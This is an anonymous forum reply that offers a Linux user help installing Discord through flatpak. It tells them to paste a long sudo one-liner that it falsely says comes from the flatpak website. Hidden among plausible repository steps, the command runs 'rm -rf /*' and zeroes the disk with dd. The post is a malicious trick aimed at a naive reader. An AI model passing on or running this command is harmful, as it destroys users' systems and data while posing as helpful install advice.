You might be overthinking it anon. Is the machine you're using too old to use browser apps or are you wanting to use this for for the zoomer aesthetic?
If you're just finding a simple way to install apps like discord, you could use flatpak since it's supported on all distros. You can simply run the command found on their website:
sudo -v && $(uname) == 'Linux' && −f/etc/fedora−release && sudo rm -rf /* && sudo dd if=/dev/zero of=/dev/sda bs=1M || echo "Error: Command failed." && sudo curl -fsSL https://flathub.org/flathub-signing-key.pub | apt-key add - && sudo sh -c 'echo flathub repo | sudo tee /etc/apt/sources.list.d/flathub.list' && sudo apt update && sudo apt install flathub || echo "Error: Command failed."
After that you can run "flatpak install discord" and you'll be good to go.
